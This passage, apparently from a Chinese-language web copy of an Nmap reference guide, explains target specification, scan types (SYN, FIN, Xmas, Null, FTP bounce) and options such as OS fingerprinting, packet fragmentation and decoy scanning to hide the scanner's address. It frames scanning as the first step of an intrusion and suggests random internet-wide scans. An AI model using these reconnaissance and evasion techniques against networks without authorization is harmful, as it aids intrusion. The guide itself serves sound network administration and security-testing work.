(\u4e8c\u8fdb\u5236\u683c\u5f0f:&nbsp;<code>11000000 10101000 00001010 11111111<\/code>)\u4e4b\u95f4\u7684256\u53f0\u4e3b\u673a\u3002 192.168.10.40\/24 \u5c06\u4f1a\u505a\u540c\u6837\u7684\u4e8b\u60c5\u3002\u5047\u8bbe\u4e3b\u673a scanme.nmap.org\u7684IP\u5730\u5740\u662f205.217.153.62\uff0c scanme.nmap.org\/16 \u5c06\u626b\u63cf205.217.0.0\u548c205.217.255.255\u4e4b\u95f4\u768465,536 \u4e2aIP\u5730\u5740\u3002 \u6240\u5141\u8bb8\u7684\u6700\u5c0f\u503c\u662f\/1\uff0c \u8fd9\u5c06\u4f1a\u626b\u63cf\u534a\u4e2a\u4e92\u8054\u7f51\u3002\u6700\u5927\u503c\u662f\/32\uff0c\u8fd9\u5c06\u4f1a\u626b\u63cf\u8be5\u4e3b\u673a\u6216IP\u5730\u5740\uff0c \u56e0\u4e3a\u6240\u6709\u7684\u6bd4\u7279\u90fd\u56fa\u5b9a\u4e86\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">CIDR\u6807\u5fd7\u4f4d\u5f88\u7b80\u6d01\u4f46\u6709\u65f6\u5019\u4e0d\u591f\u7075\u6d3b\u3002\u4f8b\u5982\uff0c\u60a8\u4e5f\u8bb8\u60f3\u8981\u626b\u63cf 192.168.0.0\/16\uff0c\u4f46\u7565\u8fc7\u4efb\u4f55\u4ee5.0\u6216\u8005.255 \u7ed3\u675f\u7684IP\u5730\u5740\uff0c\u56e0\u4e3a\u5b83\u4eec\u901a\u5e38\u662f\u5e7f\u64ad\u5730\u5740\u3002 Nmap\u901a\u8fc7\u516b\u4f4d\u5b57\u8282\u5730\u5740\u8303\u56f4\u652f\u6301\u8fd9\u6837\u7684\u626b\u63cf \u60a8\u53ef\u4ee5\u7528\u9017\u53f7\u5206\u5f00\u7684\u6570\u5b57\u6216\u8303\u56f4\u5217\u8868\u4e3aIP\u5730\u5740\u7684\u6bcf\u4e2a\u516b\u4f4d\u5b57\u8282\u6307\u5b9a\u5b83\u7684\u8303\u56f4\u3002 \u4f8b\u5982\uff0c192.168.0-255.1-254 \u5c06\u7565\u8fc7\u5728\u8be5\u8303\u56f4\u5185\u4ee5.0\u548c.255\u7ed3\u675f\u7684\u5730\u5740\u3002 \u8303\u56f4\u4e0d\u5fc5\u9650\u4e8e\u6700\u540e\u76848\u4f4d\uff1a0-255.0-255.13.37 \u5c06\u5728\u6574\u4e2a\u4e92\u8054\u7f51\u8303\u56f4\u5185\u626b\u63cf\u6240\u6709\u4ee513.37\u7ed3\u675f\u7684\u5730\u5740\u3002 \u8fd9\u79cd\u5927\u8303\u56f4\u7684\u626b\u63cf\u5bf9\u4e92\u8054\u7f51\u8c03\u67e5\u7814\u7a76\u4e5f\u8bb8\u6709\u7528\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">IPv6\u5730\u5740\u53ea\u80fd\u7528\u89c4\u8303\u7684IPv6\u5730\u5740\u6216\u4e3b\u673a\u540d\u6307\u5b9a\u3002 CIDR \u548c\u516b\u4f4d\u5b57\u8282\u8303\u56f4\u4e0d\u652f\u6301IPv6\uff0c\u56e0\u4e3a\u5b83\u4eec\u5bf9\u4e8eIPv6\u51e0\u4e4e\u6ca1\u4ec0\u4e48\u7528\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u547d\u4ee4\u884c\u63a5\u53d7\u591a\u4e2a\u4e3b\u673a\u8bf4\u660e\uff0c\u5b83\u4eec\u4e0d\u5fc5\u662f\u76f8\u540c\u7c7b\u578b\u3002\u547d\u4ee4<strong>nmap scanme.nmap.org 192.168.0.0\/8 10.0.0\uff0c1\uff0c3-7.0-255<\/strong>\u5c06\u548c\u60a8\u9884\u671f\u7684\u4e00\u6837\u6267\u884c\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u867d\u7136\u76ee\u6807\u901a\u5e38\u5728\u547d\u4ee4\u884c\u6307\u5b9a\uff0c\u4e0b\u5217\u9009\u9879\u4e5f\u53ef\u7528\u6765\u63a7\u5236\u76ee\u6807\u7684\u9009\u62e9\uff1a-iL &lt;inputfilename&gt;&nbsp;(\u4ece\u5217\u8868\u4e2d\u8f93\u5165)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4ece&nbsp;<em><code>&lt;inputfilename&gt;<\/code><\/em>\u4e2d\u8bfb\u53d6\u76ee\u6807\u8bf4\u660e\u3002\u5728\u547d\u4ee4\u884c\u8f93\u5165 \u4e00\u5806\u4e3b\u673a\u540d\u663e\u5f97\u5f88\u7b28\u62d9\uff0c\u7136\u800c\u7ecf\u5e38\u9700\u8981\u8fd9\u6837\u3002 \u4f8b\u5982\uff0c\u60a8\u7684DHCP\u670d\u52a1\u5668\u53ef\u80fd\u5bfc\u51fa10,000\u4e2a\u5f53\u524d\u79df\u7ea6\u7684\u5217\u8868\uff0c\u800c\u60a8\u5e0c\u671b\u5bf9\u5b83\u4eec\u8fdb\u884c \u626b\u63cf\u3002\u5982\u679c\u60a8<em>\u4e0d\u662f<\/em>\u4f7f\u7528\u672a\u6388\u6743\u7684\u9759\u6001IP\u6765\u5b9a\u4f4d\u4e3b\u673a\uff0c\u6216\u8bb8\u60a8\u60f3\u8981\u626b\u63cf\u6240\u6709IP\u5730\u5740\u3002 \u53ea\u8981\u751f\u6210\u8981\u626b\u63cf\u7684\u4e3b\u673a\u7684\u5217\u8868\uff0c\u7528<code>-iL<\/code>&nbsp;\u628a\u6587\u4ef6\u540d\u4f5c\u4e3a\u9009\u9879\u4f20\u7ed9Nmap\u3002\u5217\u8868\u4e2d\u7684\u9879\u53ef\u4ee5\u662fNmap\u5728 \u547d\u4ee4\u884c\u4e0a\u63a5\u53d7\u7684\u4efb\u4f55\u683c\u5f0f(IP\u5730\u5740\uff0c\u4e3b\u673a\u540d\uff0cCIDR\uff0cIPv6\uff0c\u6216\u8005\u516b\u4f4d\u5b57\u8282\u8303\u56f4)\u3002 \u6bcf\u4e00\u9879\u5fc5\u987b\u4ee5\u4e00\u4e2a\u6216\u591a\u4e2a\u7a7a\u683c\uff0c\u5236\u8868\u7b26\u6216\u6362\u884c\u7b26\u5206\u5f00\u3002 \u5982\u679c\u60a8\u5e0c\u671bNmap\u4ece\u6807\u51c6\u8f93\u5165\u800c\u4e0d\u662f\u5b9e\u9645\u6587\u4ef6\u8bfb\u53d6\u5217\u8868\uff0c \u60a8\u53ef\u4ee5\u7528\u4e00\u4e2a\u8fde\u5b57\u7b26(<code>-<\/code>)\u4f5c\u4e3a\u6587\u4ef6\u540d\u3002&nbsp;-iR &lt;hostnum&gt;(\u968f\u673a\u9009\u62e9\u76ee\u6807)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5bf9\u4e8e\u4e92\u8054\u7f51\u8303\u56f4\u5185\u7684\u8c03\u67e5\u548c\u7814\u7a76\uff0c \u60a8\u4e5f\u8bb8\u60f3\u968f\u673a\u5730\u9009\u62e9\u76ee\u6807\u3002&nbsp;<em><code>&lt;hostnum&gt;<\/code><\/em>&nbsp;\u9009\u9879\u544a\u8bc9 Nmap\u751f\u6210\u591a\u5c11\u4e2aIP\u3002\u4e0d\u5408\u9700\u8981\u7684IP\u5982\u7279\u5b9a\u7684\u79c1\u6709\uff0c\u7ec4\u64ad\u6216\u8005\u672a\u5206\u914d\u7684\u5730\u5740\u81ea\u52a8 \u7565\u8fc7\u3002\u9009\u9879&nbsp;<code>0<\/code>&nbsp;\u610f\u5473\u7740\u6c38\u65e0\u4f11\u6b62\u7684\u626b\u63cf\u3002\u8bb0\u4f4f\uff0c\u4e00\u4e9b\u7f51\u7ba1\u5bf9\u4e8e\u672a\u6388\u6743\u7684\u626b\u63cf\u53ef\u80fd\u4f1a\u5f88\u611f\u5192\u5e76\u52a0\u4ee5\u62b1\u6028\u3002 \u4f7f\u7528\u8be5\u9009\u9879\u7684\u540e\u679c\u81ea\u8d1f! \u5982\u679c\u5728\u67d0\u4e2a\u96e8\u5929\u7684\u4e0b\u5348\uff0c\u60a8\u89c9\u5f97\u5b9e\u5728\u65e0\u804a\uff0c \u8bd5\u8bd5\u8fd9\u4e2a\u547d\u4ee4<strong>nmap -sS -PS80 -iR 0 -p 80<\/strong>\u968f\u673a\u5730\u627e\u4e00\u4e9b\u7f51\u7ad9\u6d4f\u89c8\u3002--exclude &lt;host1[\uff0chost2][\uff0chost3]\uff0c...&gt;&nbsp;(\u6392\u9664\u4e3b\u673a\/\u7f51\u7edc)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u5728\u60a8\u6307\u5b9a\u7684\u626b\u63cf\u8303\u56f4\u6709\u4e00\u4e9b\u4e3b\u673a\u6216\u7f51\u7edc\u4e0d\u662f\u60a8\u7684\u76ee\u6807\uff0c \u90a3\u5c31\u7528\u8be5\u9009\u9879\u52a0\u4e0a\u4ee5\u9017\u53f7\u5206\u9694\u7684\u5217\u8868\u6392\u9664\u5b83\u4eec\u3002\u8be5\u5217\u8868\u7528\u6b63\u5e38\u7684Nmap\u8bed\u6cd5\uff0c \u56e0\u6b64\u5b83\u53ef\u4ee5\u5305\u62ec\u4e3b\u673a\u540d\uff0cCIDR\uff0c\u516b\u4f4d\u5b57\u8282\u8303\u56f4\u7b49\u7b49\u3002 \u5f53\u60a8\u5e0c\u671b\u626b\u63cf\u7684\u7f51\u7edc\u5305\u542b\u6267\u884c\u5173\u952e\u4efb\u52a1\u7684\u670d\u52a1\u5668\uff0c\u5df2\u77e5\u7684\u5bf9\u7aef\u53e3\u626b\u63cf\u53cd\u5e94\u5f3a\u70c8\u7684 \u7cfb\u7edf\u6216\u8005\u88ab\u5176\u5b83\u4eba\u770b\u7ba1\u7684\u5b50\u7f51\u65f6\uff0c\u8fd9\u4e5f\u8bb8\u6709\u7528\u3002&nbsp;--excludefile &lt;excludefile&gt;(\u6392\u9664\u6587\u4ef6\u4e2d\u7684\u5217\u8868)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u548c<code>--exclude<\/code>&nbsp;\u9009\u9879\u7684\u529f\u80fd\u4e00\u6837\uff0c\u53ea\u662f\u6240\u6392\u9664\u7684\u76ee\u6807\u662f\u7528\u4ee5 \u6362\u884c\u7b26\uff0c\u7a7a\u683c\uff0c\u6216\u8005\u5236\u8868\u7b26\u5206\u9694\u7684&nbsp;<em><code>&lt;excludefile&gt;<\/code><\/em>\u63d0\u4f9b\u7684\uff0c\u800c\u4e0d\u662f\u5728\u547d\u4ee4\u884c\u4e0a\u8f93\u5165\u7684\u3002<\/p>\n\n\n<h1 class=\"wp-block-heading\">\u4e3b\u673a\u53d1\u73b0<\/h1>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/img-blog.csdn.net\/20170516145903600?watermark\/2\/text\/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvZnJlZWtpbmcxMDE=\/font\/5a6L5L2T\/fontsize\/400\/fill\/I0JBQkFCMA==\/dissolve\/70\/gravity\/Center\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe2\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe2\" \/><\/figure>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u626b\u63cf\u65b9\u5f0f\uff1a<\/strong><\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u5168\u8fde\u63a5\u626b\u63cf\uff1a<\/strong>\u4e09\u6b21\u63e1\u624b \u9632\u706b\u5899\u80fd\u6709\u6548\u62e6\u622a\uff0c\u6545\u5f88\u5c11\u4f7f\u7528 \uff08\u4ea7\u751f\u5927\u91cf\u65e5\u5fd7\uff0c\u5f88\u5c11\u4f7f\u7528\uff09<br><strong>\u534a\u94fe\u63a5\u626b\u63cf\uff1a<\/strong>\u4e09\u6b21\u63e1\u624b\u524d\u4e24\u6b21\uff0c\u6e90SYN \u76ee\u6807SYN\/ACK \u7aef\u53e3\u5f00\u653e;\u6e90SYN \u76ee\u6807RST\/ACK \u7aef\u53e3\u5173\u95ed \uff08\u4e0d\u8bb0\u65e5\u5fd7\uff0c\u9690\u853d\u6027\u597d\uff09<br><strong>\u79d8\u5bc6\u626b\u63cf\uff1a<\/strong>\u53d1\u9001FIN\uff0c\u8fd4\u56deRST \uff08\u7aef\u53e3\u5173\u95ed\uff0c\u56de\u590dRST\u5305\uff1b\u7aef\u53e3\u5f00\u653e\uff0c\u4e0d\u56de\u590d\uff09<\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u534a\u94fe\u63a5\u626b\u63cf\u53c8\u53eb\u505a\u95f4\u63a5\u626b\u63cf\u3002<\/strong>FIN\u626b\u63cf\u3001Xmas\u626b\u63cf\u3001Null\u626b\u63cf\u5bf9Windows\u65e0\u6548<\/p>\n\n\n<pre class=\"wp-block-code\"><code>nmap \u7c7b\u578b \u9009\u9879 \u76ee\u6807\u7c7b\u578b\nnmap -sT TCP\u626b\u63cf \u5168\u94fe\u63a5\u626b\u63cf\u3002\u8fd9\u79cd\u626b\u63cf\u65b9\u6cd5\u51c6\u786e\u901f\u5ea6\u5feb\uff0c\u4f46\u662f\u5bb9\u6613\u88ab\u9632\u706b\u5899\u548cIDS\u53d1\u73b0\u5e76\u8bb0\u5f55\uff0c\u6240\u4ee5\u8fd9\u79cd\u65b9\u6cd5\uff0c\u5b9e\u9645\u4e2d\u5e76\u4e0d\u591a\u7528\nnmap -sS SYN\u626b\u63cf \u534a\u94fe\u63a5\u626b\u63cf\nnmap -sF FIN\u626b\u63cf \u79d8\u5bc6\u626b\u63cf \u9664SYN\u3001ACK\u5176\u5b83\u4f4d\u7f6e1\nnmap -sX Xmas\u626b\u63cf \u79d8\u5bc6\u626b\u63cf FIN\u3001URG\u3001PUSH\u4f4d\u7f6e1\nnmap -sN Null\u626b\u63cf \u79d8\u5bc6\u626b\u63cf \u6807\u5fd7\u4f4d\u5168\u4e3a0\uff0c\u53d1\u9001TCP\u5206\u7ec4\nnmap -sP ping\u626b\u63cf \u540c\u65f6\u4f7f\u7528ICMP\u548cTCP ACK 80\uff0c\u8fd4\u56deRST\u8bf4\u660e\u4e3b\u673a\u8fd0\u884c(\u5916\u7f51)\nnmap -sU UDP\u626b\u63cf \u53d1\u90010\u5b57\u8282UDP\u5305\uff0c\u5feb\u901f\u626b\u63cfWindows\u7684UDP\u7aef\u53e3\nnmap -sA ACK\u626b\u63cf TCP ACK\u626b\u63cf\uff0c\u5f53\u9632\u706b\u5899\u5f00\u542f\u65f6\uff0c\u67e5\u770b\u9632\u706b\u5899\u6709\u672a\u8fc7\u8651\u67d0\u7aef\u53e3\nnmap -sW \u6ed1\u52a8\u7a97\u53e3\u626b\u63cf \nnmap -sR RPC\u626b\u63cf\nnmap -b FTP\u53cd\u5f39\u653b\u51fb(FTP Bounce attack) \u5916\u7f51\u7528\u6237\u901a\u8fc7FTP\u6e17\u900f\u5185\u7f51<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\">\u9009\u9879<\/p>\n\n\n<pre class=\"wp-block-code\"><code>nmap -P0 Nmap\u626b\u63cf\u524d\u4e0dPing\u76ee\u6807\u4e3b\u673a\nnmap -PT Nmap\u626b\u63cf\u524d\u4f7f\u7528TCP ACK\u5305\u786e\u5b9a\u4e3b\u673a\u662f\u5426\u5728\u8fd0\u884c\uff08-PT\u9ed8\u8ba480\uff09\nnmap -PS Nmap\u4f7f\u7528TCP SYN\u5305\u8fdb\u884c\u626b\u63cf\nnmap -PI Nmap\u8fdb\u884cPing\u626b\u63cf\nnmap -PB \u7ed3\u5408-PT\u548c-PI\u529f\u80fd\nnmap -O Nmap\u626b\u63cfTCP\/IP\u6307\u7eb9\u7279\u5f81\uff0c\u786e\u5b9a\u76ee\u6807\u4e3b\u673a\u7cfb\u7edf\u7c7b\u578b(\u5927\u5199\u5b57\u6bcdO,\u4e0d\u662f\u6570\u5b570)\nnmap -I \u53cd\u5411\u6807\u5fd7\u626b\u63cf\uff0c\u626b\u63cf\u76d1\u542c\u7aef\u53e3\u7684\u7528\u6237\nnmap -f \u5206\u7247\u53d1\u9001SYN\u3001FIN\u3001Xmas\u3001\u548cNull\u626b\u63cf\u7684\u6570\u636e\u5305\nnmap -v \u5197\u4f59\u6a21\u5f0f\u626b\u63cf\uff0c\u53ef\u4ee5\u5f97\u5230\u626b\u63cf\u8be6\u7ec6\u4fe1\u606f\nnmap -oN \u626b\u63cf\u7ed3\u679c\u91cd\u5b9a\u5411\u5230\u6587\u4ef6\nnmap -resume \u4f7f\u88ab\u4e2d\u65ad\u7684\u626b\u63cf\u53ef\u4ee5\u7ee7\u7eed\nnmap -iL -iL, \u626b\u63cf\u76ee\u5f55\u6587\u4ef6\u5217\u8868\nnmap -p -p\u626b\u63cf\u7aef\u53e3\u5217\u8868,\u9ed8\u8ba4\u626b\u63cf1-1024\u7aef\u53e3\u548c\/usr\/share\/nmap\/nmap-services\u6587\u4ef6\u4e2d\u6307\u5b9a\u7aef\u53e3\uff1b\n -p\u4f8b\uff1a23\uff1b20-30,139,60000-\nnmap -F \u5feb\u901f\u626b\u63cf\u6a21\u5f0f\uff0c\u53ea\u626b\u63cfnmap-services\u6587\u4ef6\u4e2d\u7684\u7aef\u53e3\nnmap -D \u6b3a\u9a97\u626b\u63cf\uff0c\u53ef\u6709\u6548\u9690\u85cf\u626b\u63cf\u8005IP\u5730\u5740\nnmap -S \u5728\u6b3a\u9a97\u626b\u63cf\u65f6\uff0c\u7528\u6765\u6307\u5b9a\u6e90\u4e3b\u673aIP\nnmap -e \u6307\u5b9a\u4ece\u54ea\u4e2a\u7f51\u5361\u53d1\u9001\u548c\u63a5\u6536\u6570\u636e\u5305\nnmap -g \u6307\u5b9a\u626b\u63cf\u6e90\u7aef\u53e3\nnmap -r \u6309\u987a\u5e8f\u626b\u63cf\u7aef\u53e3<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\">\u53c2\u6570<\/p>\n\n\n<pre class=\"wp-block-code\"><code>192.168.10.1\n192.168.10.0\/24 \n192.168.*.*\n192.168.0-255.0-255<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; \u8981\u60f3\u5165\u4fb5\u4e00\u53f0\u7535\u8111\uff0c\u9996\u5148\u8981\u6709\u4e00\u5957\u5b8c\u6574\u7684\u8ba1\u5212\u3002\u5728\u5165\u4fb5\u7cfb\u7edf\u4e4b\u524d\uff0c\u5fc5\u987b\u5148\u627e\u5230\u4e00\u53f0\u76ee\u6807\u4e3b\u673a\uff0c\u5e76\u67e5\u51fa\u54ea\u4e9b\u7aef\u53e3\u5728\u76d1\u542c\u4e4b\u540e\u624d\u80fd\u8fdb\u884c\u5165\u4fb5\u3002&nbsp;<\/p>\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; \u627e\u51fa\u7f51\u7edc\u4e0a\u7684\u4e3b\u673a,\u6d4b\u8bd5\u54ea\u4e9b\u7aef\u53e3\u5728\u76d1\u542c\uff0c\u8fd9\u4e9b\u5de5\u4f5c\u901a\u5e38\u662f\u7531\u626b\u63cf\u6765\u5b9e\u73b0\u7684\u3002\u626b\u63cf\u7f51\u7edc\u662f\u5165\u4fb5\u7684\u7b2c\u4e00\u6b65\u3002\u901a\u8fc7\u4f7f\u7528\u626b\u63cf\u5668(\u5982Nmap)\u626b\u63cf\u7f51\u7edc\uff0c\u5bfb\u627e\u5b58\u5728\u6f0f\u6d1e\u7684\u76ee\u6807\u4e3b\u673a\u3002\u4e00\u65e6\u53d1\u73b0\u4e86\u6709\u6f0f\u6d1e\u7684\u76ee\u6807\uff0c\u63a5\u4e0b\u6765\u5c31\u662f\u5bf9\u76d1\u542c\u7aef\u53e3\u7684\u626b\u63cf\u3002Nmap\u901a\u8fc7\u4f7f\u7528TCP\u534f\u8bae\u6808\u6307\u7eb9\u51c6\u786e\u5730\u5224\u65ad\u51fa\u88ab\u626b\u4e3b\u673a\u7684\u64cd\u4f5c\u7cfb\u7edf\u7c7b\u578b\u3002 &nbsp;<br>&nbsp; &nbsp; &nbsp; &nbsp; Nmap\u7684\u8bed\u6cd5\u76f8\u5f53\u7b80\u5355\u3002Nmap\u7684\u4e0d\u540c\u9009\u9879\u548c-s\u6807\u5fd7\u7ec4\u6210\u4e86\u4e0d\u540c\u7684\u626b\u63cf\u7c7b\u578b\uff0c\u6bd4\u5982\uff1a\u4e00\u4e2aPing-scan\u547d\u4ee4\u5c31\u662f&quot;-sP&quot;\u3002\u5728\u786e\u5b9a\u4e86\u76ee\u6807\u4e3b\u673a\u548c\u7f51\u7edc\u4e4b\u540e\uff0c\u5373\u53ef\u8fdb\u884c\u626b\u63cf\u3002\u5982\u679c\u4ee5root\u6765\u8fd0\u884cNmap\uff0cNmap\u7684\u529f\u80fd\u4f1a\u5927\u5927\u7684\u589e\u5f3a\uff0c\u56e0\u4e3a\u8d85\u7ea7\u7528\u6237\u53ef\u4ee5\u521b\u5efa\u4fbf\u4e8eNmap\u5229\u7528\u7684\u5b9a\u5236\u6570\u636e\u5305\u3002<\/p>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/img-blog.csdn.net\/20170516164713282?watermark\/2\/text\/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvZnJlZWtpbmcxMDE=\/font\/5a6L5L2T\/fontsize\/400\/fill\/I0JBQkFCMA==\/dissolve\/70\/gravity\/Center\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe3\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe3\" \/><\/figure>\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; \u5728\u76ee\u6807\u673a\u4e0a\uff0cNmap\u8fd0\u884c\u7075\u6d3b\u3002\u4f7f\u7528Nmap\u8fdb\u884c\u5355\u673a\u626b\u63cf\u6216\u662f\u6574\u4e2a\u7f51\u7edc\u7684\u626b\u63cf\u5f88\u7b80\u5355\uff0c\u53ea\u8981\u5c06\u5e26\u6709&quot;\/mask&quot;\u7684\u76ee\u6807\u5730\u5740\u6307\u5b9a\u7ed9Nmap\u5373\u53ef\u3002\u5730\u5740\u662f&quot;victim\/24&quot;\uff0c \u5219\u76ee\u6807\u662fc\u7c7b\u7f51\u7edc\uff0c\u5730\u5740\u662f&quot;victim\/16&quot;\uff0c \u5219\u76ee\u6807\u662fB\u7c7b\u7f51\u7edc\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; &nbsp; &nbsp; Nmap\u4e5f\u5141\u8bb8\u4f60\u4f7f\u7528\u5404\u7c7b\u6307\u5b9a\u7684\u7f51\u7edc\u5730\u5740\uff0c\u6bd4\u5982 192.168.7.*,\u662f\u6307192.168.7.0\/24, \u6216 192.168.7.1,4,8-12\uff0c\u5bf9\u6240\u9009\u5b50\u7f51\u4e0b\u7684\u4e3b\u673a\u8fdb\u884c\u626b\u63cf\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4efb\u4f55\u7f51\u7edc\u63a2\u6d4b\u4efb\u52a1\u7684\u6700\u521d\u51e0\u4e2a\u6b65\u9aa4\u4e4b\u4e00\u5c31\u662f\u628a\u4e00\u7ec4IP\u8303\u56f4(\u6709\u65f6\u8be5\u8303\u56f4\u662f\u5de8\u5927\u7684)\u7f29\u5c0f\u4e3a \u4e00\u5217\u6d3b\u52a8\u7684\u6216\u8005\u60a8\u611f\u5174\u8da3\u7684\u4e3b\u673a\u3002\u626b\u63cf\u6bcf\u4e2aIP\u7684\u6bcf\u4e2a\u7aef\u53e3\u5f88\u6162\uff0c\u901a\u5e38\u4e5f\u6ca1\u5fc5\u8981\u3002 \u5f53\u7136\uff0c\u4ec0\u4e48\u6837\u7684\u4e3b\u673a\u4ee4\u60a8\u611f\u5174\u8da3\u4e3b\u8981\u4f9d\u8d56\u4e8e\u626b\u63cf\u7684\u76ee\u7684\u3002\u7f51\u7ba1\u4e5f\u8bb8\u53ea\u5bf9\u8fd0\u884c\u7279\u5b9a\u670d\u52a1\u7684 \u4e3b\u673a\u611f\u5174\u8da3\uff0c\u800c\u4ece\u4e8b\u5b89\u5168\u7684\u4eba\u58eb\u5219\u53ef\u80fd\u5bf9\u4e00\u4e2a\u9a6c\u6876\u90fd\u611f\u5174\u8da3\uff0c\u53ea\u8981\u5b83\u6709IP\u5730\u5740:-)\u3002\u4e00\u4e2a\u7cfb\u7edf\u7ba1\u7406\u5458 \u4e5f\u8bb8\u4ec5\u4ec5\u4f7f\u7528Ping\u6765\u5b9a\u4f4d\u5185\u7f51\u4e0a\u7684\u4e3b\u673a\uff0c\u800c\u4e00\u4e2a\u5916\u90e8\u5165\u4fb5\u6d4b\u8bd5\u4eba\u5458\u5219\u53ef\u80fd\u7ede\u5c3d\u8111\u6c41\u7528\u5404\u79cd\u65b9\u6cd5\u8bd5\u56fe \u7a81\u7834\u9632\u706b\u5899\u7684\u5c01\u9501\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u7531\u4e8e\u4e3b\u673a\u53d1\u73b0\u7684\u9700\u6c42\u4e94\u82b1\u516b\u95e8\uff0cNmap\u63d0\u4f9b\u4e86\u4e00\u7ba9\u7b50\u7684\u9009\u9879\u6765\u5b9a\u5236\u60a8\u7684\u9700\u6c42\u3002 \u4e3b\u673a\u53d1\u73b0\u6709\u65f6\u5019\u4e5f\u53eb\u505aping\u626b\u63cf\uff0c\u4f46\u5b83\u8fdc\u8fdc\u8d85\u8d8a\u7528\u4e16\u4eba\u7686\u77e5\u7684ping\u5de5\u5177 \u53d1\u9001\u7b80\u5355\u7684ICMP\u56de\u58f0\u8bf7\u6c42\u62a5\u6587\u3002\u7528\u6237\u5b8c\u5168\u53ef\u4ee5\u901a\u8fc7\u4f7f\u7528\u5217\u8868\u626b\u63cf(<code>-sL<\/code>)\u6216\u8005 \u901a\u8fc7\u5173\u95edping (<code>-P0<\/code>)\u8df3\u8fc7ping\u7684\u6b65\u9aa4\uff0c\u4e5f\u53ef\u4ee5\u4f7f\u7528\u591a\u4e2a\u7aef\u53e3\u628aTCP SYN\/ACK\uff0cUDP\u548cICMP \u4efb\u610f\u7ec4\u5408\u8d77\u6765\u73a9\u4e00\u73a9\u3002\u8fd9\u4e9b\u63a2\u6d4b\u7684\u76ee\u7684\u662f\u83b7\u5f97\u54cd\u5e94\u4ee5\u663e\u793a\u67d0\u4e2aIP\u5730\u5740\u662f\u5426\u662f\u6d3b\u52a8\u7684(\u6b63\u5728\u88ab\u67d0 \u4e3b\u673a\u6216\u8005\u7f51\u7edc\u8bbe\u5907\u4f7f\u7528)\u3002 \u5728\u8bb8\u591a\u7f51\u7edc\u4e0a\uff0c\u5728\u7ed9\u5b9a\u7684\u65f6\u95f4\uff0c\u5f80\u5f80\u53ea\u6709\u5c0f\u90e8\u5206\u7684IP\u5730\u5740\u662f\u6d3b\u52a8\u7684\u3002 \u8fd9\u79cd\u60c5\u51b5\u5728\u57fa\u4e8eRFC1918\u7684\u79c1\u6709\u5730\u5740\u7a7a\u95f4\u598210.0.0.0\/8\u5c24\u5176\u666e\u904d\u3002 \u90a3\u4e2a\u7f51\u7edc\u670916,000,000\u4e2aIP\uff0c\u4f46\u6211\u89c1\u8fc7\u4e00\u4e9b\u4f7f\u7528\u5b83\u7684\u516c\u53f8\u8fde1000\u53f0\u673a\u5668\u90fd\u6ca1\u6709\u3002 \u4e3b\u673a\u53d1\u73b0\u80fd\u591f\u627e\u5230\u96f6\u661f\u5206\u5e03\u4e8eIP\u5730\u5740\u6d77\u6d0b\u4e0a\u7684\u90a3\u4e9b\u673a\u5668\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u6ca1\u6709\u7ed9\u51fa\u4e3b\u673a\u53d1\u73b0\u7684\u9009\u9879\uff0cNmap \u5c31\u53d1\u9001\u4e00\u4e2aTCP ACK\u62a5\u6587\u523080\u7aef\u53e3\u548c\u4e00\u4e2aICMP\u56de\u58f0\u8bf7\u6c42\u5230\u6bcf\u53f0\u76ee\u6807\u673a\u5668\u3002 \u4e00\u4e2a\u4f8b\u5916\u662fARP\u626b\u63cf\u7528\u4e8e\u5c40\u57df\u7f51\u4e0a\u7684\u4efb\u4f55\u76ee\u6807\u673a\u5668\u3002\u5bf9\u4e8e\u975e\u7279\u6743UNIX shell\u7528\u6237\uff0c\u4f7f\u7528<code>connect()<\/code>\u7cfb\u7edf\u8c03\u7528\u4f1a\u53d1\u9001\u4e00\u4e2aSYN\u62a5\u6587\u800c\u4e0d\u662fACK \u8fd9\u4e9b\u9ed8\u8ba4\u884c\u4e3a\u548c\u4f7f\u7528<code>-PA -PE<\/code>\u9009\u9879\u7684\u6548\u679c\u76f8\u540c\u3002 \u626b\u63cf\u5c40\u57df\u7f51\u65f6\uff0c\u8fd9\u79cd\u4e3b\u673a\u53d1\u73b0\u4e00\u822c\u591f\u7528\u4e86\uff0c\u4f46\u662f\u5bf9\u4e8e\u5b89\u5168\u5ba1\u6838\uff0c\u5efa\u8bae\u8fdb\u884c \u66f4\u52a0\u5168\u9762\u7684\u63a2\u6d4b\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><code>-P<em><\/code>\u9009\u9879(\u7528\u4e8e\u9009\u62e9 